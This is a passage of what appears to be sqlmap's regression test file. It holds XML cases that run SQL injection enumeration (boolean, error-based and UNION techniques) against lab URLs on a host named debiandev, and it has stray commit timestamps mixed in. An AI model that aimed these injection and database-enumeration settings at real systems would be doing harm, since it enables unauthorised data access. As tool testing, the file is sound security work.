<db value= "information_schema,public" />
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name'" />
<item value= "r'Database: public.+Table: users.+2 columns.+name.+surname'" />
</parse>
</case>
<case name= "PostgreSQL error-based multi-threaded search enumeration - column given databases" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<db value= "information_schema,public" />
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name.+character_data'" />
<item value= "r'Database: public.+Table: users.+2 columns.+name.+surname'" />
</parse>
</case>
<case name= "PostgreSQL UNION query multi-threaded search enumeration - column given databases" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<db value= "information_schema,public" />
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name.+character_data'" />
<item value= "r'Database: public.+Table: users.+2 columns.+name.+surname'" />
</parse>
</case>
<case name= "PostgreSQL boolean-based multi-threaded search enumeration - column given tables" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
2013-01-14 16:22:00 +04:00
<tbl value= "users,sql_parts" />
2013-01-14 05:11:57 +04:00
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
2013-01-14 16:22:00 +04:00
<item value= "r'Database: public.+Table: users.+2 columns.+name.+surname'" />
<item value= "r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name'" />
2013-01-14 05:11:57 +04:00
</parse>
</case>
<case name= "PostgreSQL error-based multi-threaded search enumeration - column given tables" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
2013-01-14 16:22:00 +04:00
<tbl value= "users,sql_parts" />
2013-01-14 05:11:57 +04:00
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
2013-01-14 16:22:00 +04:00
<item value= "r'Database: public.+Table: users.+2 columns.+name.+bpchar.+surname.+bpchar'" />
<item value= "r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name.+character_data'" />
2013-01-14 05:11:57 +04:00
</parse>
</case>
<case name= "PostgreSQL UNION query multi-threaded search enumeration - column given tables" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
2013-01-14 16:22:00 +04:00
<tbl value= "users,sql_parts" />
2013-01-14 05:11:57 +04:00
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
2013-01-14 16:22:00 +04:00
<item value= "r'Database: public.+Table: users.+2 columns.+name.+bpchar.+surname.+bpchar'" />
<item value= "r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name.+character_data'" />
2013-01-14 05:11:57 +04:00
</parse>
</case>
<case name= "PostgreSQL boolean-based multi-threaded search enumeration - column given databases and table" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
2013-01-14 16:22:00 +04:00
<db value= "public,information_schema" />
<tbl value= "users,sql_parts" />
2013-01-14 05:11:57 +04:00
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
2013-01-14 16:22:00 +04:00
<item value= "r'Database: public.+Table: users.+2 columns.+name.+surname'" />
<item value= "r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name'" />
2013-01-14 05:11:57 +04:00
</parse>
</case>
<case name= "PostgreSQL error-based multi-threaded search enumeration - column given databases and table" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
2013-01-14 16:22:00 +04:00
<db value= "public,information_schema" />
<tbl value= "users,sql_parts" />
2013-01-14 05:11:57 +04:00
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
2013-01-14 16:22:00 +04:00
<item value= "r'Database: public.+Table: users.+2 columns.+name.+bpchar.+surname.+bpchar'" />
<item value= "r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name.+character_data'" />
2013-01-14 05:11:57 +04:00
</parse>
</case>
<case name= "PostgreSQL UNION query multi-threaded search enumeration - column given databases and table" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
2013-01-14 16:22:00 +04:00
<db value= "public,information_schema" />
<tbl value= "users,sql_parts" />
2013-01-14 05:11:57 +04:00
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
2013-01-14 16:22:00 +04:00
<item value= "r'Database: public.+Table: users.+2 columns.+name.+bpchar.+surname.+bpchar'" />
<item value= "r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name.+character_data'" />
2013-01-14 05:11:57 +04:00
</parse>
</case>
2013-01-19 00:37:20 +04:00
<case name= "Oracle boolean-based multi-threaded search enumeration - database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "sys" />
</switches>
<parse >
<item value= "r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'" />
</parse>
</case>
<case name= "Oracle error-based multi-threaded search enumeration - database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<db value= "sys" />
</switches>
<parse >
<item value= "r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'" />
</parse>
</case>
<case name= "Oracle UNION query multi-threaded search enumeration - database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<db value= "sys" />
</switches>
<parse >
<item value= "r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'" />
</parse>
</case>
<case name= "Oracle boolean-based multi-threaded search enumeration - tables given database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "sys" />
<tbl value= "user,aux,wrong" />
2013-01-23 17:05:10 +04:00
<answers value= "do you want to dump tables=N,do you want to crack them via a dictionary-based attack=N" />
2013-01-19 00:37:20 +04:00
</switches>
<parse >
<item value= "r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'" />
</parse>
</case>
<case name= "Oracle error-based multi-threaded search enumeration - tables given database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<db value= "sys" />
<tbl value= "user,aux,wrong" />
2013-01-23 17:05:10 +04:00
<answers value= "do you want to crack them via a dictionary-based attack=N" />
2013-01-19 00:37:20 +04:00
</switches>
<parse >
<item value= "r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'" />
<item value= "r'.+5 entries.+wu.+nameisnull'" />
</parse>
</case>
<case name= "Oracle UNION query multi-threaded search enumeration - tables given database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<db value= "sys" />
<tbl value= "user,aux,wrong" />
2013-01-23 17:05:10 +04:00
<answers value= "do you want to crack them via a dictionary-based attack=N" />
2013-01-19 00:37:20 +04:00
</switches>
<parse >
<item value= "r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'" />
<item value= "r'.+5 entries.+wu.+nameisnull'" />
</parse>
</case>
<case name= "Oracle boolean-based multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<tbl value= "users" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'" />
</parse>
</case>
<case name= "Oracle error-based multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<tbl value= "users" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'" />
</parse>
</case>
<case name= "Oracle UNION query multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<tbl value= "users" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'" />
</parse>
</case>
<case name= "Oracle boolean-based multi-threaded search enumeration - column without given db or table" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<col value= "surname,foobar" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+Table: USERS.+1 column.+SURNAME'" />
</parse>
</case>
<case name= "Oracle error-based multi-threaded search enumeration - column without given db or table" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<col value= "surname,foobar" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'" />
</parse>
</case>
<case name= "Oracle UNION query multi-threaded search enumeration - column without given db or table" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<col value= "surname,foobar" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'" />
</parse>
</case>
<case name= "Oracle boolean-based multi-threaded search enumeration - column given databases" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "sys,foobar" />
<col value= "surname" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+Table: USERS.+1 column.+SURNAME'" />
</parse>
</case>
<case name= "Oracle error-based multi-threaded search enumeration - column given databases" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<db value= "sys,foobar" />
<col value= "surname" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'" />
</parse>
</case>
<case name= "Oracle UNION query multi-threaded search enumeration - column given databases" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<db value= "sys,foobar" />
<col value= "surname" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'" />
</parse>
</case>
<case name= "Oracle boolean-based multi-threaded search enumeration - column given tables" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<tbl value= "users,foobar" />
<col value= "surname" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+Table: USERS.+1 column.+SURNAME'" />
</parse>
</case>
<case name= "Oracle error-based multi-threaded search enumeration - column given tables" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<tbl value= "users,foobar" />
<col value= "surname" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'" />
</parse>
</case>
<case name= "Oracle UNION query multi-threaded search enumeration - column given tables" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<tbl value= "users,foobar" />
<col value= "surname" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'" />
</parse>
</case>
<case name= "Oracle boolean-based multi-threaded search enumeration - column given databases and table" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "sys,foobar" />
<tbl value= "users" />
<col value= "surname" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+Table: USERS.+1 column.+SURNAME'" />
</parse>
</case>
<case name= "Oracle error-based multi-threaded search enumeration - column given databases and table" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<db value= "sys,foobar" />
<tbl value= "users" />
<col value= "surname" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'" />
</parse>
</case>
<case name= "Oracle UNION query multi-threaded search enumeration - column given databases and table" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<db value= "sys,foobar" />
<tbl value= "users" />
<col value= "surname" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'" />
</parse>
</case>
2013-01-22 00:53:11 +04:00
<case name= "IBM DB2 boolean-based multi-threaded search enumeration - database" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "d" />
</switches>
<parse >
<item value= "r'found databases.+:.+\[\*\] DB2INST1.+\[\*\] SYSIBMADM'" />
</parse>
</case>
<case name= "IBM DB2 boolean-based multi-threaded search enumeration - tables given database" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "db2inst1" />
<tbl value= "user,wrong" />
2013-01-23 17:05:10 +04:00
<answers value= "do you want to dump tables=N" />
2013-01-22 00:53:11 +04:00
</switches>
<parse >
<item value= "r'Database: DB2INST1.+1 table.+USERS'" />
</parse>
</case>
<case name= "IBM DB2 boolean-based multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<tbl value= "users" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: DB2INST1.+1 table.+USERS'" />
</parse>
</case>
<case name= "IBM DB2 boolean-based multi-threaded search enumeration - column without given db or table" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<col value= "surname,foobar" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: DB2INST1.+Table: USERS.+1 column.+SURNAME'" />
</parse>
</case>
<case name= "IBM DB2 boolean-based multi-threaded search enumeration - column given databases" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "db2inst1,foobar" />
<col value= "surname" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: DB2INST1.+Table: USERS.+1 column.+SURNAME'" />
</parse>
</case>
<case name= "IBM DB2 boolean-based multi-threaded search enumeration - column given tables" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<tbl value= "users,foobar" />
<col value= "surname" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: DB2INST1.+Table: USERS.+1 column.+SURNAME'" />
</parse>
</case>
<case name= "IBM DB2 boolean-based multi-threaded search enumeration - column given databases and table" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "db2inst1,foobar" />
<tbl value= "users" />
<col value= "surname" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: DB2INST1.+Table: USERS.+1 column.+SURNAME'" />
</parse>
</case>
2013-01-14 20:50:24 +04:00
<case name= "SQLite multi-threaded search enumeration - database" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int.php?id=1" />
<threads value= "4" />
<search value= "True" />
<db value= "e" />
</switches>
<parse >
<item value= "on SQLite it is not possible to search databases" console_output= "True" />
</parse>
</case>
<case name= "SQLite boolean-based multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<tbl value= "user" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SQLite_masterdb.+1 table.+users'" />
</parse>
</case>
<case name= "SQLite UNION query multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<tbl value= "user" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: SQLite_masterdb.+1 table.+users'" />
</parse>
</case>
2013-01-22 14:04:17 +04:00
<case name= "Firebird multi-threaded search enumeration - database" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<search value= "True" />
<db value= "e" />
</switches>
<parse >
<item value= "on Firebird it is not possible to search databases" console_output= "True" />
</parse>
</case>
<case name= "Firebird boolean-based multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<tbl value= "user" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: Firebird_masterdb.+1 table.+USERS'" />
</parse>
</case>
<case name= "Firebird UNION query multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<tbl value= "user" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: Firebird_masterdb.+1 table.+USERS'" />
</parse>
</case>
2012-12-18 19:59:48 +04:00
<!-- End of search enumeration switches -->
2012-12-18 20:30:46 +04:00
<!-- User's provided statement enumeration switches -->
<case name= "MySQL boolean-based multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<query value= "SELECT * FROM users LIMIT 0, 2" />
</switches>
<parse >
2013-01-14 20:50:24 +04:00
<item value= "r'SELECT \* FROM users LIMIT 0, 2 \[2\].+1, luther, blisset.+2, fluffy, bunny'" />
2012-12-18 20:30:46 +04:00
</parse>
</case>
<case name= "MySQL error-based multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<query value= "SELECT * FROM users LIMIT 0, 2" />
</switches>
<parse >
2013-01-14 20:50:24 +04:00
<item value= "r'SELECT \* FROM users LIMIT 0, 2 \[2\].+1, luther, blisset.+2, fluffy, bunny'" />
2012-12-18 20:30:46 +04:00
</parse>
</case>
<case name= "MySQL UNION query multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<query value= "SELECT * FROM users LIMIT 0, 2" />
</switches>
<parse >
2013-01-14 20:50:24 +04:00
<item value= "r'SELECT \* FROM users LIMIT 0, 2 \[2\].+1, luther, blisset.+2, fluffy, bunny'" />
2012-12-18 20:30:46 +04:00
</parse>
</case>
2012-12-19 17:21:16 +04:00
<case name= "MySQL boolean-based multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
2013-01-14 20:50:24 +04:00
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+2, fluffy, bunny.+1, luther, blisset.+3, wu, ming'" />
2012-12-19 17:21:16 +04:00
</parse>
</case>
<case name= "MySQL error-based multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
2013-01-14 20:50:24 +04:00
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+2, fluffy, bunny.+1, luther, blisset.+3, wu, ming'" />
2012-12-19 17:21:16 +04:00
</parse>
</case>
<case name= "MySQL UNION query multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
<!-- NOTE: it is not sorted on purpose because UNION does not play well with ORDER BY and it is stripped -->
2013-01-14 20:50:24 +04:00
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'" />
2012-12-19 17:21:16 +04:00
</parse>
</case>
2013-01-14 16:22:00 +04:00
<case name= "PostgreSQL boolean-based multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
2013-01-14 17:42:50 +04:00
<query value= "SELECT * FROM users OFFSET 0 LIMIT 2" />
2013-01-14 16:22:00 +04:00
</switches>
<parse >
2013-01-14 20:50:24 +04:00
<item value= "r'SELECT \* FROM users OFFSET 0 LIMIT 2 \[2\].+1, luther, blisset.+2, fluffy, bunny'" />
2013-01-14 16:22:00 +04:00
</parse>
</case>
<case name= "PostgreSQL error-based multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
2013-01-14 17:42:50 +04:00
<query value= "SELECT * FROM users OFFSET 0 LIMIT 2" />
2013-01-14 16:22:00 +04:00
</switches>
<parse >
2013-01-14 20:50:24 +04:00
<item value= "r'SELECT \* FROM users OFFSET 0 LIMIT 2 \[2\].+1, luther, blisset.+2, fluffy, bunny'" />
2013-01-14 16:22:00 +04:00
</parse>
</case>
<case name= "PostgreSQL UNION query multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
2013-01-14 17:42:50 +04:00
<query value= "SELECT * FROM users OFFSET 0 LIMIT 2" />
2013-01-14 16:22:00 +04:00
</switches>
<parse >
2013-01-14 20:50:24 +04:00
<item value= "r'SELECT \* FROM users OFFSET 0 LIMIT 2 \[2\].+1, luther, blisset.+2, fluffy, bunny'" />
2013-01-14 16:22:00 +04:00
</parse>
</case>
<case name= "PostgreSQL boolean-based multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
2013-01-14 20:50:24 +04:00
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+2, fluffy, bunny.+1, luther, blisset.+3, wu, ming'" />
2013-01-14 16:22:00 +04:00
</parse>
</case>
<case name= "PostgreSQL error-based multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
2013-01-14 20:50:24 +04:00
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+2, fluffy, bunny.+1, luther, blisset.+3, wu, ming'" />
2013-01-14 16:22:00 +04:00
</parse>
</case>
<case name= "PostgreSQL UNION query multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
<!-- NOTE: it is not sorted on purpose because UNION does not play well with ORDER BY and it is stripped -->
2013-01-14 20:50:24 +04:00
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'" />
</parse>
</case>
2013-01-19 01:40:11 +04:00
<case name= "Oracle boolean-based multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<query value= "SELECT * FROM users WHERE ROWNUM=1" />
</switches>
<parse >
2013-01-19 01:47:25 +04:00
<item value= "r'SELECT \* FROM users WHERE ROWNUM=1.+1, luther, blisset'" />
2013-01-19 01:40:11 +04:00
</parse>
</case>
<case name= "Oracle error-based multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<query value= "SELECT * FROM users WHERE ROWNUM=1" />
</switches>
<parse >
2013-01-19 01:47:25 +04:00
<item value= "r'SELECT \* FROM users WHERE ROWNUM=1 \[.+1.+luther'" />
2013-01-19 01:40:11 +04:00
</parse>
</case>
<case name= "Oracle UNION query multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<query value= "SELECT * FROM users WHERE ROWNUM=1" />
</switches>
<parse >
<item value= "r'SELECT \* FROM users WHERE ROWNUM=1 \[1\].+1, luther, blisset'" />
</parse>
</case>
<case name= "Oracle boolean-based multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'" />
</parse>
</case>
<case name= "Oracle error-based multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'" />
</parse>
</case>
<case name= "Oracle UNION query multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'" />
</parse>
</case>
2013-01-22 00:53:11 +04:00
<case name= "IBM DB2 boolean-based multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
2013-01-22 01:00:03 +04:00
<query value= "SELECT * FROM db2inst1.users" />
2013-01-22 00:53:11 +04:00
</switches>
<parse >
2013-01-22 01:00:03 +04:00
<item value= "r'SELECT \* FROM db2inst1.users.+1, luther, blisset.+nameisnull'" />
2013-01-22 00:53:11 +04:00
</parse>
</case>
<case name= "IBM DB2 boolean-based multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
2013-01-22 01:00:03 +04:00
<query value= "SELECT * FROM db2inst1.users ORDER BY name" />
2013-01-22 00:53:11 +04:00
</switches>
<parse >
2013-01-22 01:00:03 +04:00
<item value= "r'SELECT \* FROM db2inst1.users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'" />
2013-01-22 00:53:11 +04:00
</parse>
</case>
2013-01-14 20:50:24 +04:00
<case name= "SQLite boolean-based multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<query value= "SELECT * FROM users LIMIT 0, 2" />
</switches>
<parse >
<item value= "r'SELECT \* FROM users LIMIT 0, 2 \[2\].+1, luther, blisset.+2, fluffy, bunny'" />
</parse>
</case>
<case name= "SQLite UNION query multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<query value= "SELECT * FROM users LIMIT 0, 2" />
</switches>
<parse >
<item value= "r'SELECT \* FROM users LIMIT 0, 2 \[2\].+1, luther, blisset.+2, fluffy, bunny'" />
</parse>
</case>
<case name= "SQLite boolean-based multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int.php?id=1" />
